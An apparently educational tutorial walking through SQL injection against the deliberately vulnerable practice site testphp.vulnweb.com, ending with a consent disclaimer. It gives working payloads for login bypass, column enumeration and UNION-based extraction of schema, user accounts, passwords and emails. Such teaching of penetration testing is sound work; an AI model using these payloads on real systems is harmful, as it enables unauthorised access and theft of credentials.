FULLY GUIDED SQL Injection Interactive Learning by Seeing & Doing
tts
This Guide is designed to show each step of how you can use SQL Injection and Logic to get the Web Server to give you information.
This is a purposely Vulnerable site you can use to test and practice your Skills on. Go through each step and play around with the query's.
There are a huge wealth of more information you can get from the site.
Try new things and have fun!
Step 1
We test the server with the standard query to see whether we can login.
Code: ' OR '1' = '1
Step 2
We test the server to see what results we get if any by inserting an Apostrophe AKA 'tick'
Code: http://testphp.vulnweb.com/'
Step 3
We Notice the List Products has a 'cat=1' that looks like something we can add an 'order by' to
We keep adding until we get to '12' at which point we receive an error message. This tells us that there are 11 columns in the database.
Code: http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 7--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12--
Step 3
So we know from Step 2 we have 11 Columns, now lets see if any of those columns are vulnerable. We do this by issuing a UNION Statement and selecting all 11 columns.
Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,11
The outcome of this show use numbers displayed in the body of the web Page these numbers are indications of columns that are vulnerable.
Lets looks at '2' & '7'
Step 4
Let us now see if we can use the vulnerable columns to find the OS version of the webserver.
We do this by removing the number 7 or 2 from our URL Query like so.
Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union all select 1,2,3,4,5,6,@@version,8,9,10,11
Try this with both 2 and 7
Step 5
Let us now look to see if we can get a list of the databases of the Webserver.
Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,group_concat(schema_name),3,4,5,6,7,8,9,10,11 from
information_schema.schemata--
Step 6
Check what the Current database in use might be...
Code: http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,concat(database()),3,4,5,6,7,8,9,10,11--
Step 7
Check who the Current user is reported to be..
Code: http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,concat(user()),3,4,5,6,7,8,9,10,11--
Step 8
Grab the Tables
Either like this
Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables where table_schema=database()--
Or Like this
Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11 from information_schema.tables where table_schema=database()--
Step 9
Get the Columns
Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 from information_schema.columns where table_schema=database()--
Step 10
Get the List of Users
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,concat
(uname,0x3a,pass,0x3a,email,0x3a,name),8,9,10,11 from users
This site is designed for Pentesters for Proof of Concept style testing to enhance their security methodology.
It is purely for educational purposes and I do not condone or recommend attempting any of the techniques in any of these videos on any network or part of any network you do not have 100% consent to do so on. I hold no responsibility for any loss of service, corruption or loss of data due to taking any of the following the steps in any tutorials from this site.
This site has been created for educational purposes to explain techniques for enthusiastic network engineers and security experts to helping understanding how to improve their security and stop unauthorized access.
2015-10-01 20:15:23
source
Gloss